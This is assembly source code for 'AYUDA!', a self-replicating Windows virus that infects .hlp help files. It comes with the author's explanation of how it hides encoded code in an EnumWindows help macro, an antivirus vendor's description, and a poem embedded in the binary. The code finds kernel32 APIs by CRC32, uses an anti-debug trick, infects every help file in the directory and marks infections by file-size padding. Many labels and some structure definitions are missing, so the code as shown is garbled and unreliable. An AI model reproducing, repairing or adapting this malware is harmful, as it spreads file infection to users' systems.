;  AYUDA! coded by Bumblebee/29a
;  the generic HLP infector (tm)
;  AYUDA is the spanish word for help. If you need 'ayuda' infecting hlp
;  files this is the source you're looking for ;)
;  But keep in mind that AYUDA is not equal to tutorial!
;  Disclaimer:
;       . This  is  the  source  code  of  a VIRUS. The  author  is  not
;         responsabile of any  damage that may occur due to the assembly
;         of this file. Pontius Pilate is washing his hands ;)
;  Features:
;       . Takes control directly from the  hlp file using macros and the
;         EnumWindows function. The virus body is stored in the call.
;       . Searches for the required APIs using CRCs instead of names.
;       . Uses SEH.
;       . Infects hlp files adding a EnumWindows call in the system file
;         and plazing this new system at the end of file.
;       . Uses size padding as infection sign.
;  Hlp infection brief:
;       . The hlp  infection  is so easy. First you must  understand the
;       internal format of hlp files: is like a pakaged file system.
;       Yeah!  There are  directories, files and so.  Once you have this
;       part there is  another point you  must take into account: how to
;       give  control to the virus. The solution that AYUDA  exploits is
;       that WinHlp32 let us say the  kind of parameters an imported API
;       will use. So if you look for any function with callback features
;       (all the enum functions), you can change the parameter that uses
;       the address of  code to be executed by a string. An this  string
;       will be the virus code. WinHlp32 allocates memory for the string
;       (a  string is a  pointer to a  vector of chars)  and passes that
;       address to the enum function. Once you have the control you must
;       execute the  code... and that's all? NOPE! Your  virus code MUST
;       be a string! So you need to change the code to fit in the string
;       required by WinHlp32. At  this case i've  encoded the virus in a
;       way that  allows to  change the code to make  WinHlp32 happy and
;       later restore it for normal execution. The virus  generates some
;       code that pushes the entire virus into the stack. This code it's
;       ok for  WinHlp32  (avoids on its  body some characters) and when
;       executes restores the  whole virus into the stack  and the jumps
;       there, does its  work, fixes  the stack  and returns  ending the
;       callback process.
;       I think that with this little explanation and the full commented
;       source you'll be able to understand this kind of infection.
;       Excuse my english!
;                                                     The way of the bee
; Description from:
; http://www.viruslist.com/eng/viruslist.asp?id=3981&key=000010000800002
; from AVP.
; WinHLP.Pluma 
; This is Windows32 HLP files infector, it does function and replicate as
; a Windows Help script embedded in help file structure. See also WinHLP.Demo
; and Win95.SK".
; When infected HLP file is opened, the Windows Help system processes virus
; script and executes all functions placed there. By using a trick the virus
; forces Help system to execute a specially prepared data as binary Windows32
; program, these data are included in one of instructions in the virus
; script. These data themselves are the "start-up" routine that builds the
; main infection routine and executes it. The infection routine is a valid
; Windows32 procedure, and it is executed as a Windows32 application.
; When infection routine takes control, it scans Windows kernel (KERNEL32.DLL
; image loaded in Windows memory) in usual for Win32 executable files
; parasitic infectors, and gets addresses of necessary Windows functions
; from there. The infection routine then looks for all Windows Help files in
; the current directory, and infects them all.
; While infecting the virus modifies internal HLP file structure, adds its
; script to the "SYSTEM" area, converts its code to start-up routine and
; includes it into the script.
; The virus does not manifest itself in any way. It contains the text
; strings:
; < AYUDA! Coded by Bumblebee/29a >
; Cumpliendo con mi oficio
; piedra con piedra, pluma a pluma,
; pasa el invierno y deja
; sitios abandonados
; habitaciones muertas:
; yo trabajo y trabajo,
; debo substituir tantos olvidos,
; llenar de pan las tinieblas,
; fundar otra vez la esperanza.

.model flat

        extrn           ExitProcess:PROC

HLPHEADER       struc
hhMagic                 dd      ?
hhDirectoryStart        dd      ?
hhNonDirectoryStart     dd      ?
hhEntireFileSize        dd      ?
HLPHEADER       ends

fhReservedSpace         dd      ?
fhUsedSpace             dd      ?
fhFileFlags             db      ?

BTREEHEADER     struct
bthMagic                dw      ?
bthFlags                dw      ?
bthPageSize             dw      ?
bthStructure            db      10h dup(?)
bthMustBeZero           dw      ?
bthPageSplits           dw      ?
bthRootPage             dw      ?
bthMustBeNegOne         dw      ?
bthTotalPages           dw      ?
bthNLeves               dw      ?
bthTotalEntries         dd      ?

; from BC++ Win32 API on-line Reference
WIN32_FIND_DATA         struc
dwFileAttributes        dd      0
dwLowDateTime0          dd      ?       ; creation
dwHigDateTime0          dd      ?
dwLowDateTime1          dd      ?       ; last access
dwHigDateTime1          dd      ?
dwLowDateTime2          dd      ?       ; last write
dwHigDateTime2          dd      ?
nFileSizeHigh           dd      ?
nFileSizeLow            dd      ?
dwReserved              dd      0,0
cFileName               db      260 dup(0)
cAlternateFilename      db      14 dup(0)
                        db      2 dup(0)
WIN32_FIND_DATA         ends

        K32WIN9X        equ     0bff70000h      ; Windows 95/98
        vSize           equ     vEnd-vBegin     ; size of the baby
        PADDING         equ     7               ; infection sign


dummy           db      'WARNING - This is a virus laucher - WARNING'


        push    eax                             ; simulate the callback for
        push    eax                             ; 1st generation
        push    offset goOut
        sub     esp,((vSize/2)+1)*2             ; why i'm doing this? ;)
        jmp     virusBegin

        push    0h
        call    ExitProcess

vBegin  label   byte

        pushad                                  ; save all regs

        call    delta                           ; get delta offset
        pop     ebp
        sub     ebp,offset delta

        lea     eax,dword ptr [esp-8h]          ; setup SEH
        xor     edi,edi
        xchg    eax,dword ptr fs:[edi]
        lea     edi,exception+ebp
        push    edi
        push    eax

        mov     esi,K32WIN9X                    ; fixed addr of the K32
        cmp     word ptr [esi],'ZM'             ; K32! are you there?
        jne     quitSEH

        ; little anti-debug trick
        xor     edi,edi
        add     esi,dword ptr fs:[edi+20h]

        ; Get APIs stuff with CRC32 instead of names...
        mov     esi,dword ptr [esi+3ch]
        add     esi,K32WIN9X
        mov     esi,dword ptr [esi+78h]
        add     esi,K32WIN9X
        add     esi,1ch

        add     eax,K32WIN9X
        mov     dword ptr [address+ebp],eax
        add     eax,K32WIN9X
        mov     dword ptr [names+ebp],eax
        add     eax,K32WIN9X
        mov     dword ptr [ordinals+ebp],eax

        sub     esi,16
        mov     dword ptr [nexports+ebp],eax

        xor     edx,edx
        mov     dword ptr [expcount+ebp],edx
        lea     eax,FSTAPI+ebp

        mov     esi,dword ptr [names+ebp]
        add     esi,edx
        mov     esi,dword ptr [esi]
        add     esi,K32WIN9X
        push    eax edx
        movzx   di,byte ptr [eax+4]
        call    CRC32
        xchg    ebx,eax
        pop     edx eax
        cmp     ebx,dword ptr [eax]
        je      fFound
        add     edx,4
        inc     dword ptr [expcount+ebp]
        push    edx
        mov     edx,dword ptr [expcount+ebp]
        cmp     dword ptr [nexports+ebp],edx
        pop     edx
        je      quitSEH
        jmp     searchl
        shr     edx,1
        add     edx,dword ptr [ordinals+ebp]
        xor     ebx,ebx
        mov     bx,word ptr [edx]
        shl     ebx,2
        add     ebx,dword ptr [address+ebp]
        mov     ecx,dword ptr [ebx]
        add     ecx,K32WIN9X

        mov     dword ptr [eax+5],ecx
        add     eax,9
        xor     edx,edx
        mov     dword ptr [expcount+ebp],edx
        lea     ecx,ENDAPI+ebp
        cmp     eax,ecx
        jb      searchl

        ; infect all the hlp files in current directory
        lea     esi,find_data+ebp
        push    esi
        lea     esi,hlpMask+ebp
        push    esi
        call    dword ptr [_FindFirstFileA+ebp]
        inc     eax
        jz      quitSEH
        dec     eax

        mov     dword ptr [findHnd+ebp],eax

        mov     eax,dword ptr [find_data.nFileSizeLow+ebp]
        mov     ecx,PADDING                     ; test if it's infected
        xor     edx,edx                         ; yet
        div     ecx
        or      edx,edx                         ; reminder is zero?
        jz      skipThisFile

        lea     esi,find_data.cFileName+ebp
        call    infect

        lea     esi,find_data+ebp
        push    esi
        push    dword ptr [findHnd+ebp]
        call    dword ptr [_FindNextFileA+ebp]  ; Find next file
        or      eax,eax
        jnz     findNext

        push    dword ptr [findHnd+ebp]
        call    dword ptr [_FindClose+ebp]      ; close find handle

        xor     esi,esi                         ; quit SEH
        pop     dword ptr fs:[esi]
        pop     eax

        add     esp,((vSize/2)+1)*2             ; fix stack
        xor     eax,eax                         ; return FALSE
        ret     8                               ; pop the args of the call
                                                ; (are two: 2*4=8 bytes)

        xor     esi,esi                         ; we are not under
        mov     eax,dword ptr fs:[esi]          ; win9x... a pitty
        mov     esp,dword ptr [eax]
        jmp     quitSEH

; does the hlp infection
; IN: esi addr of file name
        xor     eax,eax
        push    eax
        push    80h
        push    3h
        push    eax
        push    eax
        push    80000000h OR 40000000h
        push    esi
        call    dword ptr [_CreateFileA+ebp]
        inc     eax
        jz      errorOut
        dec     eax

        mov     dword ptr [fHnd+ebp],eax

        xor     eax,eax
        push    eax
        push    eax
        push    eax
        push    4h
        push    eax
        push    dword ptr [fHnd+ebp]
        call    dword ptr [_CreateFileMappingA+ebp]
        or      eax,eax
        jc      errorOutClose

        mov     dword ptr [mfHnd+ebp],eax

        xor     eax,eax
        push    eax
        push    eax
        push    eax
        push    00000004h OR 00000002h
        push    dword ptr [mfHnd+ebp]
        call    dword ptr [_MapViewOfFile+ebp]
        or      eax,eax
        jz      errorOutCloseMap

        ; here begins the hlp infection stuff

        ; save begin of hlp header
        mov     edi,eax

        ; check is a valid HLP file
        cmp     dword ptr [edi.hhMagic],00035f3fh
        jne     notNiceHlp

        ; get file size information in the header (not the same than
        ; 'file in disk' size)
        mov     ecx,dword ptr [eax.hhEntireFileSize]
        mov     dword ptr [fileSize+ebp],ecx

        ; goto directory start
        add     edi,dword ptr [edi.hhDirectoryStart]
        add     edi,size HLPFILEHEADER
        ; check is a valid directory
        cmp     word ptr [edi],293bh
        jne     notNiceHlp
        ; i don't want indexed data, so only one level b-trees
        ; are nice for me ;)
        cmp     word ptr [edi.bthNLeves],1
        jne     notNiceHlp

        ; scan for |SYSTEM directory.
        ; search 512 bytes into the b-tree and ignore the internal
        ; structures of b-tree.
        add     edi,size BTREEHEADER
        mov     ecx,200h

        cmp     dword ptr [edi],'SYS|'
        je      foundSystemDir
        inc     edi
        loop    searchSystemDir
        jmp     notNiceHlp

        ; as i only infect non-indexed hlp files, i'm sure the
        ; data that follows the |SYSTEM zstring is the offset of
        ; the directory. 1st skip the zstring
        add     edi,8
        ; now goto to the directory (offset from hlp header)
        ; and set the new system directory at the end of file
        mov     esi,dword ptr [fileSize+ebp]
        xchg    esi,dword ptr [edi]
        mov     edi,esi
        add     edi,eax

        ; save begin of this file
        mov     edx,edi
        add     edi,size HLPFILEHEADER

        ; check is a system directory
        cmp     word ptr [edi],036ch
        jne     notNiceHlp

        ; check version
        mov     esi,edi
        add     esi,0ch
        cmp     word ptr [edi+2],10h
        ja      noTitleHere

        ; if has title, skip it (version <= 16)
        inc     esi
        cmp     byte ptr [esi-1],0
        je      skipTitle
        mov     edi,esi

        ; get size of the directory
        mov     esi,dword ptr [edx]

        ; the max size of the macro, just an aproximation
        add     esi,((vSize/2)*10)+1000h

        ; alloc a temporary buffer
        push    00000004h
        push    00001000h
        push    esi
        push    0
        call    dword ptr [_VirtualAlloc+ebp]
        or      eax,eax
        jne     bufferOk
        jmp     notNiceHlp

        mov     dword ptr [mHnd+ebp],eax

        ; copy system directory plus our macro to the buffer

        ; 1st old system
        mov     edi,dword ptr [mHnd+ebp]
        mov     esi,edx
        mov     ecx,dword ptr [edx]
        rep     movsb

        ; begin 'our macro' generation
        ; save mapped file handle
        push    eax
        ; save begin of our macros
        push    edi
        lea     esi,hlpMacro0+ebp
        mov     ecx,hlpMacroSize0
        rep     movsb

        ; generate the macro 'virus body' ;)
        ; it sholud be more simple but... hehe
        lea     ecx,vBegin+ebp
        lea     esi,vEnd+ebp
        dec     ecx
        dec     esi
        cmp     byte ptr [esi],0                ; those chars must be
        je      fix                             ; changed 'cause they have
        cmp     byte ptr [esi],22h              ; a sentimental value
        je      fix                             ; for winhlp32 in macroz
        cmp     byte ptr [esi],27h
        je      fix
        cmp     byte ptr [esi],5ch
        je      fix
        cmp     byte ptr [esi],60h
        je      fix
        mov     al,0b4h
        mov     ah,byte ptr [esi]
        dec     esi
        cmp     esi,ecx
        je      macroDoneFix
        cmp     byte ptr [esi],0
        je      fix2
        cmp     byte ptr [esi],22h
        je      fix2
        cmp     byte ptr [esi],27h
        je      fix2
        cmp     byte ptr [esi],5ch
        je      fix2
        cmp     byte ptr [esi],60h
        je      fix2
        mov     al,0b0h
        mov     ah,byte ptr [esi]
        mov     ax,5066h
        dec     esi
        cmp     esi,ecx
        je      macroDone
        jmp     getNext
        mov     al,0b4h
        mov     ah,byte ptr [esi]
        dec     ah
        mov     ax,0c4feh
        dec     esi
        cmp     esi,ecx
        je      macroDoneFix
        jmp     getNextInPair
        mov     al,0b0h
        mov     ah,byte ptr [esi]
        dec     ah
        mov     ax,0c0feh
        mov     ax,5066h
        dec     esi
        cmp     esi,ecx
        je      macroDone
        jmp     getNext

        mov     al,0b0h
        mov     ah,90h
        mov     ax,5066h

        ; end the macro
        lea     esi,hlpMacro1+ebp
        mov     ecx,hlpMacroSize1
        rep     movsb

        ; fix the macro size
        pop     esi                             ; get begin of macros
        mov     ecx,edi                         ; end of macros
        sub     ecx,esi                         ; size of macros
        sub     ecx,offset macro1-hlpMacro
                                                ; sub size of 1st macro and
                                                ; and the header of 2nd
        mov     word ptr [esi+offset macroSize-hlpMacro],cx
                                                ; store it! (at its offset)
        pop     eax

        ; into edi the size of the new system
        sub     edi,dword ptr [mHnd+ebp]
        mov     dword ptr [systemSize+ebp],edi

        ; fix directory size plus header
        mov     edx,dword ptr [mHnd+ebp]
        mov     dword ptr [edx],edi
        ; fix directory size
        push    edi
        sub     edi,size HLPFILEHEADER
        mov     dword ptr [edx+4],edi
        pop     edi

        ; increase hlp file size
        add     dword ptr [eax.hhEntireFileSize],edi
        ; and save
        push    dword ptr [eax.hhEntireFileSize]

        push    eax
        call    dword ptr [_UnmapViewOfFile+ebp]

        push    dword ptr [mfHnd+ebp]
        call    dword ptr [_CloseHandle+ebp]

        ; get new hlp file size
        pop     eax
        ; calculate size with padding
        mov     ecx,PADDING
        xor     edx,edx
        div     ecx
        inc     eax
        xor     edx,edx
        mul     ecx
        mov     dword ptr [padSize+ebp],eax

        xor     eax,eax
        push    eax
        push    dword ptr [padSize+ebp]
        push    eax
        push    4h
        push    eax
        push    dword ptr [fHnd+ebp]
        call    dword ptr [_CreateFileMappingA+ebp]
        or      eax,eax
        jc      errorOutClose

        mov     dword ptr [mfHnd+ebp],eax

        xor     eax,eax
        push    dword ptr [padSize+ebp]
        push    eax
        push    eax
        push    00000004h OR 00000002h
        push    dword ptr [mfHnd+ebp]
        call    dword ptr [_MapViewOfFile+ebp]
        or      eax,eax
        jz      errorOutCloseMap

        ; add the modified system directory
        mov     edi,eax
        add     edi,dword ptr [fileSize+ebp]
        mov     esi,dword ptr [mHnd+ebp]
        mov     ecx,dword ptr [systemSize+ebp]
        rep     movsb

        push    eax
        push    00008000h
        push    0h
        push    dword ptr [mHnd+ebp]
        call    dword ptr [_VirtualFree+ebp]
        pop     eax

        push    eax
        call    dword ptr [_UnmapViewOfFile+ebp]

        push    dword ptr [mfHnd+ebp]
        call    dword ptr [_CloseHandle+ebp]

        push    dword ptr [fHnd+ebp]
        call    dword ptr [_CloseHandle+ebp]


; CRC32
;  IN:  esi     offset of data to do CRC32
;       edi     size to do CRC32
;  OUT:
;       eax     CRC32
; Original routine by Vecna. Gracias!
; This is one of these piezes of code that became essential to
; the virus coder.
        xor     ecx,ecx
        dec     ecx
	mov     edx,ecx
	push    ebx
	xor     eax,eax
	xor     ebx,ebx
	xor     al,cl
	mov     cl,ch
	mov     ch,dl
	mov     dl,dh
	mov     dh,8
	shr     bx,1
	rcr     ax,1
	jnc     NoCRC
	xor     ax,08320h
	xor     bx,0EDB8h
        dec     dh
	jnz     NextBitCRC
	xor     ecx,eax
	xor     edx,ebx
        dec     edi
	jnz     NextByteCRC
	pop     ebx
	not     edx
	not     ecx
	mov     eax,edx
	rol     eax,16
	mov     ax,cx

copyright       db      '< AYUDA! Coded by Bumblebee/29a >'

messForAvers    db      0dh,0ah
                db      'Cumpliendo con mi oficio',0dh,0ah
                db      'piedra con piedra, pluma a pluma,',0dh,0ah
                db      'pasa el invierno y deja',0dh,0ah
                db      'sitios abandonados',0dh,0ah
                db      'habitaciones muertas:',0dh,0ah
                db      'yo trabajo y trabajo,',0dh,0ah
                db      'debo substituir tantos olvidos,',0dh,0ah
                db      'llenar de pan las tinieblas,',0dh,0ah
                db      'fundar otra vez la esperanza.',0dh,0ah

; CRC32 and plaze to store APIs used
FSTAPI                  label   byte
CrcCreateFileA          dd      08c892ddfh
size0                   db      12
_CreateFileA            dd      0

CrcMapViewOfFile        dd      0797b49ech
size1                   db      14
_MapViewOfFile          dd      0

CrcCreatFileMappingA    dd      096b2d96ch
size2                   db      19
_CreateFileMappingA     dd      0

CrcUnmapViewOfFile      dd      094524b42h
size3                   db      16
_UnmapViewOfFile        dd      0

CrcCloseHandle          dd      068624a9dh
size4                   db      12
_CloseHandle            dd      0

CrcFindFirstFileA       dd      0ae17ebefh
size5                   db      15
_FindFirstFileA         dd      0

CrcFindNextFileA        dd      0aa700106h
size6                   db      14
_FindNextFileA          dd      0

CrcFindClose            dd      0c200be21h
size7                   db      10
_FindClose              dd      0

CrcVirtualAlloc         dd      04402890eh
size8                   db      13
_VirtualAlloc           dd      0

CrcVirtualFree          dd      02aad1211h
size9                   db      12
_VirtualFree            dd      0
ENDAPI                  label   byte

; data for the macro generation
hlpMacroSize    equ     (endOfMacro1-hlpMacro)+vSize
hlpMacro        label   byte
hlpMacro0       db      4,0,macro0Ends-offset macro0,0
macro0          db      'RR("USER32","EnumWindows","SU")',0
macro0Ends      label   byte
                db      4,0
macroSize       dw      ?
macro1          db      'EnumWindows("'
endOfMacro0     label   byte
hlpMacro1:      jmp     esp
                db      '",0)',0
endOfMacro1     label   byte
hlpMacroSize0   equ     endOfMacro0-hlpMacro
hlpMacroSize1   equ     endOfMacro1-offset hlpMacro1

; several handles
fHnd            dd      0
mfHnd           dd      0
mHnd            dd      0
; to store... erm
fileSize        dd      0
; file size with padding
padSize         dd      0
; the size of the generated system file
systemSize      dd      0
; used into API search
address         dd      0
names           dd      0 
ordinals        dd      0
nexports        dd      0
expcount        dd      0
; for find files
hlpMask         db      '*.hlp',0,0
findHnd         dd      0
find_data       WIN32_FIND_DATA <?>

vEnd    label   byte

end     inicio